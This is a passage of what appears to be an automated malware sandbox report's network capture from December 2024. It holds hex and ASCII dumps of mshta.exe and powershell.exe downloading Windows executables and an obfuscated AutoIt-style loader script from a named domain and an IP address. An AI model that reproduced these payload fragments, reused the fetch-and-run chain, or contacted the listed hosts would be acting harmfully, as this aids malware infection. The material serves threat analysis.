                                                                                        Data Ascii: u4{hH\$xH0A_A^A]A\_^]3HHXHhHpHx ATAVAWH HE3LcJH9HHO(E3H};DvHeIHHtG9Cuw<LLH$HHHH
                                                                                        Dec 18, 2024 20:55:34.444499016 CET1236INData Raw: 0d 3f f3 0e 00 48 83 f9 03 76 b8 4c 8b 05 2a f3 0e 00 eb a4 83 c8 ff 89 05 5b f3 0e 00 89 05 51 f3 0e 00 e9 f2 fe ff ff 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 48 8b 9a 10 03 00 00 49 8b e8 48 8b fa 4c 8b f3 48
                                                                                        Data Ascii: ?HvL*[QHHXHhHpHx AVH HIHLHtGHtH;ucHsHcHH;jHH H1Ht*H3DBH\$0Hl$8Ht$@H|$HH A^H%AH/Hr@SH HIHHAH
                                                                                        Dec 18, 2024 20:55:34.444513083 CET896INData Raw: ff ff 49 8b 0e 48 8d 54 24 40 ff 15 20 3d 0b 00 4c 8d 9c 24 90 00 00 00 49 8b 5b 18 49 8b 73 20 49 8b 7b 28 49 8b e3 41 5e c3 cc cc 48 89 5c 24 10 48 89 4c 24 08 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 30 45 33 ff 48 8b ca 49 8b d8 48 8b fa 45
                                                                                        Data Ascii: IHT$@ =L$I[Is I{(IA^H\$HL$UVWATAUAVAWH0E3HIHEgDd$pEwD2D%uHHt03Dd$(!t$ EE3DKE+A;H[EH\$xH0A_A^A]A\_^]HLLcAED$<s DKHIIA;
                                                                                        Dec 18, 2024 20:55:34.446285963 CET1236INData Raw: 4c 8b 44 24 40 4c 8b 4c 24 38 44 8a b4 24 a0 00 00 00 e9 45 ff ff ff cc 48 89 5c 24 08 57 48 83 ec 20 80 3d 37 eb 0e 00 00 41 8b f8 48 8b da 74 21 48 8b ca ff 15 7e 2e 0b 00 8d 47 02 c6 05 1c eb 0e 00 00 48 8b cb 83 f8 01 76 4a ff 15 76 2f 0b 00
                                                                                        Data Ascii: LD$@LL$8D$EH\$WH =7AHt!H~.GHvJv/HHt-HQ/HH%D.H%H\$0H _<.HHXHhHpHx AVH@EAHA9l$x|$pHiHd$
                                                                                        Dec 18, 2024 20:55:34.446494102 CET1236INData Raw: 44 8b c2 48 8b d1 e8 05 00 00 00 48 83 c4 38 c3 48 89 5c 24 10 48 89 6c 24 18 48 89 4c 24 08 56 57 41 55 41 56 41 57 48 83 ec 50 4c 8d 2d 1a e5 0e 00 49 8b f1 49 8b cd 41 8b e8 48 8b fa e8 6d 02 00 00 4c 63 f8 41 83 ff ff 0f 84 ef 01 00 00 48 8b
                                                                                        Data Ascii: DHH8H\$Hl$HL$VWAUAVAWHPL-IIAHmLcAH$E3D95JJ;;wX-3zQH?D$ LLHV-I


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.749766139.99.188.124807636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 18, 2024 20:55:41.614795923 CET164OUTGET /hvshp HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: 139.99.188.124
                                                                                        Connection: Keep-Alive
                                                                                        Dec 18, 2024 20:55:43.083080053 CET1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 19:55:42 GMT
                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                        Last-Modified: Sat, 14 Dec 2024 20:29:43 GMT
                                                                                        ETag: "da2a8-62940cebb8084"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 893608
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 [TRUNCATED]
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDR*R*R*CP*S*_@a*_@*_@g*[j[*[jw*R+r**S*_@S*RP*S*RichR*PEL_pZ"@@@@|Ppq; [@.text `.rdata@@.datatR@.rsrcP<@@.relocqpr@B
                                                                                        Dec 18, 2024 20:55:43.083297014 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 44 61 4c 00
                                                                                        Data Ascii: DaLhC\YLhCKYNhC:YhC.Y<ChCYhCYQ>hCYsLQ@sLP9hCYGhC
                                                                                        Dec 18, 2024 20:55:43.084069967 CET1236INData Raw: 46 04 59 83 24 b8 00 47 3b 7e 08 72 e7 ff 76 04 83 66 08 00 e8 bc fb 01 00 59 5f 5e c3 56 8b f1 57 8b 4e 78 85 c9 75 59 8b 46 7c 83 f8 0b 0f 8f 2a a4 03 00 0f 84 0a a4 03 00 83 e8 05 74 4e 83 e8 03 0f 84 df a3 03 00 48 48 0f 84 bd a3 03 00 83 66
                                                                                        Data Ascii: FY$G;~rvfY_^VWNxuYF|*tNHHfpNTF|N$NV\Y_^QfxNptQ,SV3WN~^^^N$NT^4^8^<^@^D~H~L^P^d^h^p^x
                                                                                        Dec 18, 2024 20:55:43.084702015 CET1236INData Raw: 89 45 f4 f7 d9 89 55 0c 89 4d 08 80 38 08 73 53 83 c2 08 40 89 45 f4 05 f0 f7 ff ff 03 c1 89 55 0c 3b 46 0c 8b 45 f4 7c e2 8b 46 0c 3b d8 74 1a 2b c3 50 8d 86 10 08 00 00 03 c3 50 8d 43 02 8d 04 c6 50 57 ff 15 24 01 49 00 8b 76 04 85 f6 75 8d ff
                                                                                        Data Ascii: EUM8sS@EU;FE|F;t+PPCPW$IvuuW_^[];t +QPCPW$IEUMtDuLMtuWzME8tM@tEujPQWEUM#E
                                                                                        Dec 18, 2024 20:55:43.084719896 CET1236INData Raw: 00 83 7e 4c ff 8b f8 74 03 8b 7e 4c 57 53 ff 15 40 01 49 00 6a 00 57 e8 55 08 00 00 eb 8f 8b c8 83 e9 4e 0f 84 aa 9e 03 00 83 e9 05 0f 84 90 9e 03 00 83 e9 28 0f 84 71 9e 03 00 83 e9 09 0f 84 52 9e 03 00 81 e9 8d 00 00 00 0f 84 30 9e 03 00 49 0f
                                                                                        Data Ascii: ~Lt~LWS@IjWUN(qR0IIIDjUuuR+t#I4Iu-V&SVPWPVItIIhQQVCj~jwQHjUVW
                                                                                        Dec 18, 2024 20:55:43.085397959 CET1236INData Raw: 0f 85 55 9c 03 00 5f 5e 5b 8b e5 5d c2 0c 00 8b 7d 0c 66 8b 46 58 80 bf 90 00 00 00 07 66 89 87 88 00 00 00 66 8b 46 5c 66 89 87 8a 00 00 00 74 5f 66 8b 46 60 66 89 87 8c 00 00 00 66 8b 46 64 66 89 87 8e 00 00 00 8d 45 dc 50 ff 37 ff 15 34 06 49
                                                                                        Data Ascii: U_^[]}fFXffF\ft_fF`ffFdfEP74I9^Xt=9^\tEEP7I9^`9^d{}tfEffEfUwLMEtAXEtA\E~A`E~Ad]
                                                                                        Dec 18, 2024 20:55:43.085412025 CET1236INData Raw: 8b 4d 08 56 57 85 c9 0f 88 9e 9b 03 00 83 f9 03 7c 50 3b 8a 84 00 00 00 7f 48 8b 42 74 8b 04 88 8b 00 85 c0 74 3c 8b 75 10 8b 40 04 89 0e 8b 4d 0c 89 01 8b c8 8b 42 60 8b 04 88 83 38 00 74 22 8b 0e 83 f9 03 7c 1b 3b 8a 84 00 00 00 7f 13 8b 42 74
                                                                                        Data Ascii: MVW|P;HBtt<u@MB`8t"|;Bt8t_^]2UVW};FttQ?Ft ;u?|Ft8uO}NxNxFt4FtYNx$~xvNxFtD
                                                                                        Dec 18, 2024 20:55:43.086112022 CET1236INData Raw: f8 89 45 0c 83 7d 20 ff 75 46 6a 00 8d 45 e8 50 6a 00 6a 30 ff 15 40 07 49 00 6a 08 ff 15 58 05 49 00 8b 4d ec 2b 4d 18 03 4d f4 2b c8 8b c1 99 2b c2 d1 f8 89 45 20 f7 c3 00 00 40 00 74 11 6a 04 ff 15 58 05 49 00 6a fe 99 59 f7 f9 01 45 20 ff 75
                                                                                        Data Ascii: E} uFjEPjj0@IjXIM+MM++E @tjXIjYE uEujjPIuEjSPIE+Ej5xLju$PE+EPu uSuhIu IVjPIE$GEG<E G@EP74IE+EGDE+EjjGH
                                                                                        Dec 18, 2024 20:55:43.086126089 CET1236INData Raw: 00 50 66 a1 b8 77 4c 00 66 89 86 86 00 00 00 8b 55 1c 8b 45 10 8b 4d 14 8b 7d 18 89 55 fc 8b 55 28 83 e2 02 89 45 ec 89 4d f0 89 7d f8 89 55 d8 0f 85 28 9b 03 00 53 ff 75 1c 57 51 50 e8 f4 f1 ff ff 8b 7b 60 8b 43 58 8b 4b 5c 89 7d f8 8b 7b 64 89
                                                                                        Data Ascii: PfwLfUEM}UU(EM}U(SuWQP{`CXK\}{dEM}U}E$2@u$u uuuuWVSUM(xLHxL=DxL}ujVS4{Pu1{T
                                                                                        Dec 18, 2024 20:55:43.086893082 CET1236INData Raw: 39 4d 08 7e 46 6a 30 5a 85 ff 78 3f 8b 45 f4 0f b7 04 78 83 f8 39 77 41 66 3b c2 72 3c 2b c2 51 53 99 52 50 e8 64 2b 03 00 01 06 8b 4d fc 11 56 04 4f 8b 45 f8 0f a4 d9 04 6a 30 c1 e3 04 40 89 4d fc 89 45 f8 5a 3b 45 08 7c bd 83 ff ff 75 20 b0 01
                                                                                        Data Ascii: 9M~Fj0Zx?Ex9wAf;r<+QSRPd+MVOEj0@MEZ;E|u _^[]AF7&f2V~t~Wu~F_N^NytQ~FyuyA@t@yuyAt@UV~u
                                                                                        Dec 18, 2024 20:55:43.203727961 CET1236INData Raw: 83 66 04 00 eb df 33 f6 eb e5 55 8b ec 56 8b 75 08 57 8b f9 85 f6 74 54 83 7e 18 00 74 08 ff 76 18 e8 e4 ff ff ff 83 7e 1c 00 75 46 80 7e 10 00 75 15 8b 7e 14 85 ff 74 0e 8b cf e8 29 16 00 00 57 e8 ef d4 01 00 59 8b 46 0c ff 08 8b 46 0c 83 38 00
                                                                                        Data Ascii: f3UVuWtT~tv~uF~u~t)WYFF8u6vYYVY_^]vUQS]VuWM)!_^[]U}tDVW}EPWPuV#yNOwf_^]~FGwfE`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.749795139.99.188.124807396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 18, 2024 20:55:49.218987942 CET74OUTGET /EsgMle.txt HTTP/1.1
                                                                                        Host: 139.99.188.124
                                                                                        Connection: Keep-Alive
                                                                                        Dec 18, 2024 20:55:50.738563061 CET1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 19:55:50 GMT
                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                        Last-Modified: Sat, 14 Dec 2024 20:29:43 GMT
                                                                                        ETag: "12fd62-62940cebb8084"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 1244514
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/plain
                                                                                        Data Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24 4f 64 48 42 74 20 3d 20 32 38 20 54 6f 20 38 36 35 0a 49 66 20 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 32 20 54 68 65 6e 0a 53 71 72 74 28 37 39 35 35 29 0a 46 69 6c 65 45 78 69 73 74 73 28 [TRUNCATED]
                                                                                        Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $OdHBt = 28 To 865If $VerifiedUnderstoodValidation = 32 ThenSqrt(7955)FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUnderstoodValidation = 33 ThenConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5))DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2))Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUndersto
                                                                                        Dec 18, 2024 20:55:50.738723993 CET1236INData Raw: 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 20 54 68 65 6e 0a 24 4e 75 74 74 65 6e 49 6e 76 65 73 74 6f 72 73 52 61 6c 65 69 67 68 20 3d 20 44 65 63 28 57 61 6c 65 73 28 22 31 30 34 5d 31 31 33 5d 31 30 35 5d 38 36 5d 38 35 5d 39 36 5d 38
                                                                                        Data Ascii: odValidation = 34 Then$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]83]73]78]127]105]97]79]105]77",28/4))ExitLoopEndIfNext$LAYERSSTRICTINNOVATIVE = '66150718350940696046327902621'$DmModsQueries = 68$DRESSDEARANTIQUES = 93Wh
                                                                                        Dec 18, 2024 20:55:50.738729954 CET448INData Raw: 6c 4c 69 62 72 61 72 69 61 6e 53 70 69 72 69 74 55 20 3d 20 24 54 68 65 6f 72 65 74 69 63 61 6c 4c 69 62 72 61 72 69 61 6e 53 70 69 72 69 74 55 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 54 68 65 6f 72 65 74 69 63 61 6c 4c 69 62 72 61 72 69 61
                                                                                        Data Ascii: lLibrarianSpiritU = $TheoreticalLibrarianSpiritU + 1EndIfIf $TheoreticalLibrarianSpiritU = 18 Then$locateheadquarterssuccessfully = PixelGetColor(Wales("82]124]123]88]85]72]105]73]102]127]126]82]119",5/1), Wales("82]124]123]88]85]72]105]73]
                                                                                        Dec 18, 2024 20:55:50.738744974 CET1236INData Raw: 29 0a 43 6f 6e 73 6f 6c 65 57 72 69 74 65 45 72 72 6f 72 28 57 61 6c 65 73 28 22 38 35 5d 31 31 33 5d 31 32 32 5d 31 30 35 5d 31 30 37 5d 31 31 36 5d 31 30 39 5d 35 31 5d 39 35 5d 31 30 39 5d 31 30 35 5d 31 32 30 5d 31 31 39 5d 31 31 38 5d 35 31
                                                                                        Data Ascii: )ConsoleWriteError(Wales("85]113]122]105]107]116]109]51]95]109]105]120]119]118]51",64/8))$HOLDEMOLDSIGMA = $HOLDEMOLDSIGMA + 1EndIfIf $HOLDEMOLDSIGMA = 67 Then$IntendComputersArea = PixelGetColor(90, 215, 0)ExitLoopEndIfIf $HOLDEMOLDSI
                                                                                        Dec 18, 2024 20:55:50.739296913 CET1236INData Raw: 5d 39 35 5d 38 33 5d 31 30 32 5d 31 31 39 5d 31 30 36 5d 31 31 36 5d 31 30 36 5d 31 31 32 5d 31 31 31 5d 31 31 36 5d 39 35 22 2c 38 2f 38 29 29 0a 24 6d 69 73 73 69 6f 6e 73 67 72 65 65 6e 68 6f 75 73 65 20 3d 20 24 6d 69 73 73 69 6f 6e 73 67 72
                                                                                        Data Ascii: ]95]83]102]119]106]116]106]112]111]116]95",8/8))$missionsgreenhouse = $missionsgreenhouse + 1EndIfNext$soundsfarswitchsufficiently = '1764830625190115630455157117955314553809907711398'$SCALESWXETHNICOMAHA = 79$eosroutestreasury = 78For
                                                                                        Dec 18, 2024 20:55:50.739304066 CET1236INData Raw: 5d 31 32 34 5d 39 35 5d 38 35 5d 31 30 39 5d 38 35 5d 31 31 38 5d 37 38 5d 31 32 38 5d 37 33 5d 31 32 39 5d 37 35 5d 31 31 37 5d 39 36 22 2c 32 34 2f 33 29 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 49 66 20 24 44 49 4c 44 4f 53 59 49 45
                                                                                        Data Ascii: ]124]95]85]109]85]118]78]128]73]129]75]117]96",24/3))ExitLoopEndIfIf $DILDOSYIELDSFAREADDRESSED = 37 ThenConsoleWriteError(Wales("85]81]84]86]96]89]67]73]71]85]96]69]78]67]87]85]71]96]86]67]78]71]85]96",12/6))PixelGetColor(Wales("128]108]
                                                                                        Dec 18, 2024 20:55:50.739321947 CET1236INData Raw: 4c 65 73 73 50 68 6f 6e 65 20 2b 20 31 0a 45 6e 64 49 66 0a 57 45 6e 64 0a 24 54 6f 6e 79 54 72 65 61 73 75 72 65 73 45 76 61 6c 75 61 74 69 6e 67 20 3d 20 27 39 35 37 39 30 37 32 38 39 34 31 39 33 37 31 37 34 32 38 33 39 31 39 34 35 34 32 35 37
                                                                                        Data Ascii: LessPhone + 1EndIfWEnd$TonyTreasuresEvaluating = '957907289419371742839194542570574875273050762245784821196346572'$InterestedDieDocs = 28$RenewalTissueBarn = 79While 761If $InterestedDieDocs = 27 ThenFileExists(Wales("76]81]75]77]55]88
                                                                                        Dec 18, 2024 20:55:50.740082026 CET1236INData Raw: 6d 65 6e 74 20 3d 20 27 30 30 38 33 30 38 32 36 32 34 30 32 31 31 27 0a 24 41 63 74 72 65 73 73 47 6f 6e 65 4c 69 63 65 6e 73 65 20 3d 20 32 31 0a 24 68 61 73 70 6c 69 74 77 69 72 65 64 73 6c 65 65 70 73 20 3d 20 38 34 0a 57 68 69 6c 65 20 33 34
                                                                                        Data Ascii: ment = '00830826240211'$ActressGoneLicense = 21$hasplitwiredsleeps = 84While 345If $ActressGoneLicense = 19 ThenDriveStatus(Wales("73]118]119]124]112]109]122]55]91]112]119]119]124]55]88]119]123]113]118]111]55",40/5))DriveStatus(Wales("86
                                                                                        Dec 18, 2024 20:55:50.740091085 CET1236INData Raw: 3d 20 38 32 0a 46 6f 72 20 24 5a 6d 64 43 58 64 77 20 3d 20 39 34 20 54 6f 20 36 38 30 0a 49 66 20 24 49 6c 6c 6e 65 73 73 46 6f 6c 6b 20 3d 20 36 20 54 68 65 6e 0a 41 54 61 6e 28 38 36 32 38 29 0a 46 69 6c 65 45 78 69 73 74 73 28 57 61 6c 65 73
                                                                                        Data Ascii: = 82For $ZmdCXdw = 94 To 680If $IllnessFolk = 6 ThenATan(8628)FileExists(Wales("68]118]113]116]62",1/1))Sqrt(7932)$IllnessFolk = $IllnessFolk + 1EndIfIf $IllnessFolk = 7 ThenChr(4337)ConsoleWriteError(Wales("76]71]100]78]71]95]100]90
                                                                                        Dec 18, 2024 20:55:50.740102053 CET1236INData Raw: 49 6e 63 6f 72 70 6f 72 61 74 65 64 48 6f 75 72 20 3d 20 38 31 20 54 68 65 6e 0a 24 53 74 61 72 74 73 45 71 75 69 74 79 49 6e 63 75 72 72 65 64 4c 61 79 6f 75 74 20 3d 20 38 38 0a 24 41 44 41 50 54 49 56 45 47 52 41 50 48 49 43 46 41 4d 45 47 41
                                                                                        Data Ascii: IncorporatedHour = 81 Then$StartsEquityIncurredLayout = 88$ADAPTIVEGRAPHICFAMEGAUGE = 98For $UcgR = 62 To 786If $StartsEquityIncurredLayout = 87 ThenPixelGetColor(Wales("87]78]76]78]92]92]74]91]82]85]98]51]84]74]82]51]81]94]91]91]82]76]74
                                                                                        Dec 18, 2024 20:55:50.861265898 CET1236INData Raw: 20 35 34 20 54 68 65 6e 0a 45 78 70 28 35 34 34 29 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 32 38 2c 20 37 38 39 2c 20 30 29 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 39 37 2c 20 32 35 38 2c 20 30 29 0a 24 52 45 43 4f 4d 4d 45 4e 44 45 44
                                                                                        Data Ascii: 54 ThenExp(544)PixelGetColor(28, 789, 0)PixelGetColor(97, 258, 0)$RECOMMENDEDDOCUMENTED = $RECOMMENDEDDOCUMENTED + 1EndIfIf $RECOMMENDEDDOCUMENTED = 55 ThenDec(Wales("84]81]73]74]84]77]69]90]77]93]86]81]87]86]69]74]81]79]79]77]91]92]69


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.749716147.45.49.1554437892C:\Windows\System32\mshta.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 19:55:25 UTC330OUTGET /duydemo HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-CH
                                                                                        UA-CPU: AMD64
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                        Host: tiffany-careers.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-18 19:55:26 UTC396INHTTP/1.1 200 OK
                                                                                        etag: "12b41-675e876c-25348;;;"
                                                                                        last-modified: Sun, 15 Dec 2024 07:38:20 GMT
                                                                                        content-length: 76609
                                                                                        accept-ranges: bytes
                                                                                        date: Wed, 18 Dec 2024 19:55:25 GMT
                                                                                        server: LiteSpeed
                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                        connection: close
                                                                                        2024-12-18 19:55:26 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 13 b2 ed 95 57 d3 83 c6 57 d3 83 c6 57 d3 83 c6 43 b8 86 c7 56 d3 83 c6 43 b8 80 c7 55 d3 83 c6 43 b8 87 c7 43 d3 83 c6 43 b8 82 c7 50 d3 83 c6 57 d3 82 c6 73 d3 83 c6 43 b8 8a c7 56 d3 83 c6 43 b8 7c c6 56 d3 83 c6 43 b8 81 c7 56 d3 83 c6 52 69 63 68 57 d3 83 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 43 9e 30 35 00 00 00
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$WWWCVCUCCCPWsCVC|VCVRichWPELC05
                                                                                        2024-12-18 19:55:26 UTC16384INData Raw: 32 2e 64 6c 6c 00 00 6f 00 5f 58 63 70 74 46 69 6c 74 65 72 00 c9 00 5f 5f 70 5f 5f 63 6f 6d 6d 6f 64 65 00 00 11 01 5f 61 6d 73 67 5f 65 78 69 74 00 00 a1 00 5f 5f 67 65 74 6d 61 69 6e 61 72 67 73 00 e2 00 5f 5f 73 65 74 5f 61 70 70 5f 74 79 70 65 00 00 ae 04 65 78 69 74 00 00 73 01 5f 65 78 69 74 00 24 01 5f 63 65 78 69 74 00 00 ce 00 5f 5f 70 5f 5f 66 6d 6f 64 65 00 00 07 02 5f 69 73 6d 62 62 6c 65 61 64 00 00 e4 00 5f 5f 73 65 74 75 73 65 72 6d 61 74 68 65 72 72 00 00 e8 01 5f 69 6e 69 74 74 65 72 6d 00 f7 00 5f 61 63 6d 64 6c 6e 00 35 00 3f 74 65 72 6d 69 6e 61 74 65 40 40 59 41 58 58 5a 00 6d 73 76 63 72 74 2e 64 6c 6c 00 00 37 01 5f 63 6f 6e 74 72 6f 6c 66 70 00 00 6a 01 5f 65 78 63 65 70 74 5f 68 61 6e 64 6c 65 72 34 5f 63 6f 6d 6d 6f 6e 00 7f 05
                                                                                        Data Ascii: 2.dllo_XcptFilter__p__commode_amsg_exit__getmainargs__set_app_typeexits_exit$_cexit__p__fmode_ismbblead__setusermatherr_initterm_acmdln5?terminate@@YAXXZmsvcrt.dll7_controlfpj_except_handler4_common
                                                                                        2024-12-18 19:55:26 UTC16384INData Raw: 48 2c 6f 48 2c 6c 48 2c 58 67 2c 62 54 2c 6f 48 2c 6c 48 2c 48 54 2c 61 4e 2c 6f 48 2c 6c 48 2c 74 43 2c 72 58 2c 6f 48 2c 6c 48 2c 58 67 2c 62 54 2c 6f 48 2c 6c 48 2c 48 54 2c 6c 48 2c 6f 48 2c 6c 48 2c 74 43 2c 4f 48 2c 6f 48 2c 6c 48 2c 48 54 2c 62 54 2c 6f 48 2c 6c 48 2c 74 43 2c 4f 48 2c 6f 48 2c 6c 48 2c 48 54 2c 6c 48 2c 6f 48 2c 6c 48 2c 74 43 2c 69 44 2c 6f 48 2c 6c 48 2c 74 43 2c 69 44 2c 6f 48 2c 6c 48 2c 48 54 2c 61 4e 2c 6f 48 2c 6c 48 2c 74 43 2c 72 58 2c 6f 48 2c 6c 48 2c 48 54 2c 61 4e 2c 6f 48 2c 6c 48 2c 48 54 2c 61 4e 2c 6f 48 2c 6c 48 2c 74 43 2c 69 44 2c 6f 48 2c 6c 48 2c 74 43 2c 72 58 2c 6f 48 2c 6c 48 2c 74 43 2c 69 44 2c 6f 48 2c 6c 48 2c 74 43 2c 48 54 2c 6f 48 2c 6c 48 2c 48 54 2c 61 4e 2c 6f 48 2c 6c 48 2c 74 43 2c 72 58 2c 6f
                                                                                        Data Ascii: H,oH,lH,Xg,bT,oH,lH,HT,aN,oH,lH,tC,rX,oH,lH,Xg,bT,oH,lH,HT,lH,oH,lH,tC,OH,oH,lH,HT,bT,oH,lH,tC,OH,oH,lH,HT,lH,oH,lH,tC,iD,oH,lH,tC,iD,oH,lH,HT,aN,oH,lH,tC,rX,oH,lH,HT,aN,oH,lH,HT,aN,oH,lH,tC,iD,oH,lH,tC,rX,oH,lH,tC,iD,oH,lH,tC,HT,oH,lH,HT,aN,oH,lH,tC,rX,o
